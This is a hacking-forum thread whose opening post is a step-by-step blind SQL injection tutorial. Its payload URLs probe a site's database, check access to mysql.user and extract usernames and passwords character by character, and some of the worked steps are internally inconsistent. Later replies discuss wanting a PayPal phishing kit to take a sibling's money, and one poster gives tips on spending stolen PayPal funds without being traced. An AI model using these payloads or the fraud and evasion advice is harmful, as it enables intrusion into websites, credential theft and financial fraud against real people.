How to hack a website[Sql Injection]

This is a discussion on How to hack a website[Sql Injection] within the Real Life Hacks board part of the General category; NOTE:This is for people that already know some basics about sql injection! I suggest you also get some snacks cuz ...

Page 1 of 2 12 LastLast
Results 1 to 10 of 20
  1. #1
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16

    Post How to hack a website[Sql Injection]

    NOTE:This is for people that already know some basics about sql injection! I suggest you also get some snacks cuz its a pretty big post!
    For my tutorial i will use the following site as example:

    http://www.site.com/news.php?id=5

    when we execute this, we see some page and articles on that page, pictures etc...

    then when we want to test it for blind sql injection attack..

    http://www.site.com/news.php?id=5 and 1=1

    <--- this is always true
    and the page loads normally, that's ok.
    now the real test....


    http://www.site.com/news.php?id=5 and 1=2

    <--- this is false

    so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

    1) Get the MySQL version

    to get the version in blind attack we use substring

    i.e

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

    this should return TRUE if the version of MySQL is 4.

    replace 4 with 5, and if query return TRUE then the version is 5.

    i.e

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

    2) Test if subselect works

    when select don't work then we use subselect

    i.e

    http://www.site.com/news.php?id=5 and (select 1)=1

    if page loads normally then subselects work.

    then we gonna see if we have access to mysql.user

    i.e

    http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

    if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

    3). Check table and column names

    This is part when guessing is the best friend

    i.e.

    http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

    (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

    then if the page loads normally without content missing, the table users exits.
    if you get FALSE (some article missing), just change table name until you guess the right one

    let's say that we have found that table name is users, now what we need is column name.

    the same as table name, we start guessing. Like i said before try the common names for columns.

    i.e

    http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

    if the page loads normally we know that column name is password (if we get false then try common names or just guess)



    here we merge 1 with the column password, then substring returns the first character (,1,1)

    4). Pull data from database

    we found table users i columns username password so we gonna pull characters from that.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

    ok this here pulls the first character from first user in table users.

    substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

    and then compare it with simbol greater then > .

    so if the ascii char greater then 80, the page loads normally. (TRUE)

    we keep trying until we get false.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

    we get TRUE, keep incrementing

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

    TRUE again, higher

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    FALSE!!!

    so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

    then let's check the second character.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

    Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    TRUE, the page loads normally, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

    FALSE, lower number.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

    TRUE, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

    FALSE!!!

    we know that the second character is char(105) and that is 'i'. We have 'ci' so far

    so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

    There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

    cause that makes you better SQL INJECTOR

    Hope this helped! (Post taken from www.pakcyberarmy.net, not made by me)
    Last edited by Mihailo665; 05-12-2011 at 02:49 PM.

  2. The Following User Says Thank You to Mihailo665 For This Useful Post:


  3. #2
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16
    I did a lot of editing i forgot to post the link. Still it was pretty noobish and ye kinda gay. Sorry all for that. Wont happen again.

  4. #3
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16
    Is there any paypal phisner tutorial or dl link...pm me if d3scene doesnt allow paypal hacking stuff...Thank you in advance.

  5. #4
    Smoogel's Avatar
    Smoogel is offline Premium Member
    Array
    Join Date
    May 2010
    Location
    England
    Posts
    648
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    9
    Reputation
    442
    Quote Originally Posted by Mihailo665 View Post
    Is there any paypal phisner tutorial or dl link...pm me if d3scene doesnt allow paypal hacking stuff...Thank you in advance.
    Hmm you want an PayPal phiser?

    That's just asking for trouble...

    Perhaps you do not know what you are attempting to step into?

  6. #5
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16
    Quote Originally Posted by Smoogel View Post
    Hmm you want an PayPal phiser?

    That's just asking for trouble...

    Perhaps you do not know what you are attempting to step into?
    I know what i am going to step into. I know the 90% risk and the 10% benefit, but i just need some help on making the phishner for it. Im having some trouble with adjusting the source from it.

    ---------- Post added at 070 PM ---------- Previous post was at 07:21 PM ----------

    I know what im about to step into.

  7. The Following User Says Thank You to Mihailo665 For This Useful Post:


  8. #6
    Idbjorn is offline Advanced Hacker
    Array
    Join Date
    Apr 2011
    Posts
    395
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    6
    Reputation
    97
    I've seen a tutorial like this long ago, doesn't matter who copied who because SQL injection has been around for a long time. milw0rm was filled with tons of exploits like this before it was shut down. I wouldn't recommend PayPal phishing no matter what is attached to the account, credit cards and bank accounts aren't dumb. Those two alone are very easy to track, maybe if there was money on the account it has potential to be safe, but is probably a bad idea in the end.

    Quote Originally Posted by Mihailo665 View Post
    I know what i am going to step into. I know the 90% risk and the 10% benefit, but i just need some help on making the phishner for it. Im having some trouble with adjusting the source from it.

    ---------- Post added at 070 PM ---------- Previous post was at 07:21 PM ----------

    I know what im about to step into.
    You do realize you can be tracked from IP, MAC, cache, cookies, and various other ways, right?

  9. #7
    FAlTH's Avatar
    FAlTH is offline Hacker
    Array
    Join Date
    Mar 2011
    Posts
    200
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    6
    Reputation
    82
    Quote Originally Posted by Idbjorn View Post
    I've seen a tutorial like this long ago, doesn't matter who copied who because SQL injection has been around for a long time. milw0rm was filled with tons of exploits like this before it was shut down. I wouldn't recommend PayPal phishing no matter what is attached to the account, credit cards and bank accounts aren't dumb. Those two alone are very easy to track, maybe if there was money on the account it has potential to be safe, but is probably a bad idea in the end.



    You do realize you can be tracked from IP, MAC, cache, cookies, and various other ways, right?
    Dont forget the bank account where you transfer the money to.

  10. #8
    Idbjorn is offline Advanced Hacker
    Array
    Join Date
    Apr 2011
    Posts
    395
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    6
    Reputation
    97
    Quote Originally Posted by FAlTH View Post
    Dont forget the bank account where you transfer the money to.
    Oh, you would have to be an idiot to transfer the money to your own bank account. But I think you're joking, lol. If anything spend the money on the PayPal account right away from another computer not using your connection, buying virtual goods from foreign sites not hosted in the U.S would be the safest route.

  11. #9
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16
    I do not intend to hack any1 i just want to annoy my brother and change his password cuz dad just got him 100$ on the account! And yeah i know everything and all the risks.

  12. #10
    Mihailo665's Avatar
    Mihailo665 is offline Member
    Array
    Join Date
    Jul 2010
    Location
    Serbia
    Posts
    41
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Rep Power
    7
    Reputation
    16
    I honestly really dunno where else to post it sry.

Page 1 of 2 12 LastLast

Similar Threads

  1. (Q) SQL Injection (kalonline)
    By walid445200 in forum KalOnline
    Replies: 15
    Last Post: 07-21-2011, 03:11 AM
  2. Injection problem
    By amerkiller1995 in forum CS 1.6 Hacks
    Replies: 8
    Last Post: 11-28-2010, 07:55 PM
  3. hack this website for donation points?
    By P_I_T in forum WoW Private Server Hacks
    Replies: 7
    Last Post: 02-23-2010, 08:51 PM
  4. SQL Injection
    By Ginzo in forum Other Games
    Replies: 0
    Last Post: 04-03-2007, 02:11 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •